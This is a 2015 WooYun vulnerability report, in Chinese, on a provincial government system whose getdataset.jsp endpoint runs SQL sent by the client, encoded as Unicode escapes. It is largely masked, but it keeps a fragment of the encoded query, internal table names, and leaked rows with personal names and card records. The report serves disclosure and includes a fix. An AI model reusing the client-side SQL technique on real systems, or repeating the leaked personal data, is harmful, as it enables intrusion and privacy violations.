

缺陷编号:wooyun-2015-0155774

漏洞标题:某省敏感部门某系统存在设计缺陷(Unicode编码案例)

相关厂商:某省敏感部门

漏洞作者: 路人甲

提交时间:2015-11-25 13:34

修复时间:2016-01-13 16:12

公开时间:2016-01-13 16:12

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:



漏洞详情

披露状态:

2015-11-25: 细节已通知厂商并且等待厂商处理中
2015-11-29: 厂商已经确认,细节仅向厂商公开
2015-12-09: 细节向核心白帽子及相关领域专家公开
2015-12-19: 细节向普通白帽子公开
2015-12-29: 细节向实习白帽子公开
2016-01-13: 细节向公众公开

简要描述:

设计缺陷,求帮打马赛克

详细说明:

mask 区域
1.http://**.**.**/login_czw.jsp_
*****2a842dc479c2.png" alt=&quo*****
*****^已经注册^*****
*****feaadadba54e.png" alt=&quo*****
*****此时系统会向^*****
*****ode*****
2.://**.**.**//**.**.**.**/public/getdataset.jsp HTTP/1.1_
*****t: *****
*****uage: *****
******.**/szpt/we*****
*****on/x-www-for*****
*****: gzip, *****
*****IE 9.0; Windows NT 6*****
*******.*******
*****ength*****
***** Keep-*****
***** no-*****
*****R2offKyOG08Kp7*****
**********
*****5F$u0075$u0073$u0065$u0072 $u0077$u0068$u0065$u0072$u0065 c_mobileno='^*****
*****de&g*****
**********
*****^^的而且使^*****
*****^^以^*****
*****ode*****
*****0066$u0072$u006F$u006*****
*****de&g*****
*****^^^*****
*****42910774d056.png" alt=&quo*****

漏洞证明:

mask 区域
*****^^数大^*****
*****c7fdf05bf3bf.png" alt=&quo*****
*****ode*****
*****);var rs=new js*****
*****e("z*****
*****BLE_NAME",&q*****
*****String",&qu*****
*****LGY_ZRQ",&q*****
*****OUSE_TMP",&*****
*****NFO_BZ",&qu*****
*****O_BZ_TMP1",&*****
*****BZ_TMP1_BAK",*****
*****ERSON",&quo*****
*****BSJ_LOG",&q*****
*****CARDNO",&q*****
*****JNLK",&quo*****
*****20130609",&q*****
*****LK_0531",&q*****
*****_20130531",&*****
*****LK_BF",&quo*****
*****LK_HIS",&qu*****
*****LK_JK",&quo*****
*****LK_JK0913",*****
*****LK_OLD",&qu*****
*****JWLK",&quo*****
*****JWLK_JK",&*****
*****XX_HF",&quo*****
*****TDCY",&quo*****
*****_COUNT",&q*****
*****MP",&quot*****
*****FZ_ZJSL",&q*****
*****nd*****
**********
*****de&g*****
*****t;,"14036429*****
*****c250d1b496e4.png" alt=&quo*****
*****有姓名被编^*****
*****ode*****
*****uot;INSERTFLAG","SUNIT_CODE","SORG_LOGGED","SORG_LOGGED_ID","SWHO_LOGGED","DWHEN_LOGGED","SCANCEL_SIGN","DWHEN_CANCELLED","S*****
*****de&g*****
**********
*****^^*****
*****3f3d8d452aae.png" alt=&quo*****
**********
**********
*****这^*****
*****t;,"1868*****
*****^量^*****
*****f59daf2232b9.png" alt=&quo*****
*****^^看*****
*****40d06cc8dac2.png" alt=&quo*****
*****ode*****
*****;2011-06-11 11:37:28.0","fazcbg",null,null,null,"2011-06-10 13:42:06.0","3509811014",null,"fazcbg",null,"1307684230859",null,"1","0","其他&q*****
*****37:46.0","2011-06-11 01:49:55.0","古田县华侨大厦",null,null,null,"2011-06-10 13:42:34.0","3522270029",null,"gthqds",null,"1307684266625",null,"1&*****
*****0","0036","0036","牡丹卡",null,"2008-11-21 18:25:29.0","3504020018","2008-11-23 12:35:10.0","0036",null,null,null,"4","1",null*****
*****;8119","牡丹卡",null,"2008-11-21 18:25:31.0","3504810019","2008-11-22 14:48:28.0","8119",null,null,null,"4","1",null,"2008-11-21*****
*****","8016",null,"牡丹卡",null,"2008-11-21 18:25:34.0","3504280016",null,"8016",null,null,null,"1","1",null,"2008-1*****
*****;2008-11-22 15:12:58.0","陈丽华","陈丽华","牡丹卡",null,"2008-11-21 18:25:54.0","3504260018","2008-11-22 15:12:58.0",null,null,null,null,"4&q*****
*****11-23 09:18:22.0","0327","0054","牡丹卡",null,"2008-11-21 18:25:57.0","3504030027","2008-11-23 09:18:22.0",null,null,null,null,"4",&quo*****
*****t;2008-11-24 21:03:38.0","8019","8019","牡丹卡",null,"2008-11-21 18:26:06.0","3504280019","2008-11-24 21:03:38.0","8019",null,null,null,"4&*****
*****07 21:12:33.0","2717","2717","牡丹卡",null,"2008-11-21 20:52:31.0","3504270017","2008-12-07 21:12:33.0","2717",null,null,null,"4","1&quo*****
*****06-28 20:49:49.0","2909",null,"牡丹卡",null,"2008-11-21 20:52:40.0","3504290009",null,"2909",null,null,null,"1","1&q*****
*****","0042","牡丹卡",null,"2008-11-21 20:52:47.0","3504030021","2008-11-24 15:50:57.0","0042",null,null,null,"4","1",nul*****
*****","0054","0054","牡丹卡",null,"2008-11-21 20:52:58.0","3504030027","2008-11-22 10:09:20.0","0054",null,null,null,"4","1",null,&*****
*****54:34.0","8134","8134","牡丹卡",null,"2008-11-21 20:53:09.0","3504810034","2009-02-11 17:54:34.0",null,null,null,null,"4","1&q*****
*****;,"0042","0042","牡丹卡",null,"2008-11-21 20:43:35.0","3504030021","2008-11-24 15:50:57.0","0042",null,null,null,"4","1&q*****
*****-24 11:17:32.0","唐加联","唐加联","牡丹卡",null,"2008-11-21 20:43:37.0","3504250012","2008-11-24 11:17:32.0",null,null,null,null,"4"*****
*****0","2009-03-20 14:17:18.0","0202",null,"牡丹卡",null,"2008-11-21 20:43:44.0","3504020002",null,"0202",null,null,null,"1","1&quo*****
*****"2009-03-17 00:39:10.0","0244",null,"牡丹卡",null,"2008-11-21 20:43:49.0","3504020044",null,"0244",null,null,null,"1",&q*****
*****2:09.0","2008-11-22 10:31:30.0","2714","2714","牡丹卡",null,"2008-11-21 20:43:54.0","3504270014","2008-11-22 10:31:30.0",null,null,null,null,&quo*****
*****quot;2011-06-11 14:05:58.0","东侨长兴足浴",null,null,null,"2011-06-10 13:42:35.0","3509990799",null,"dqcxzy",null,"1307684273234",null,"1","0",&quo*****
*****nd*****
**********
*****de&g*****
*****^^*****

修复方案:

不要让客户端传递 SQL 语句;查询应在服务端构造,客户端只提交数据参数。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-11-29 16:10

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无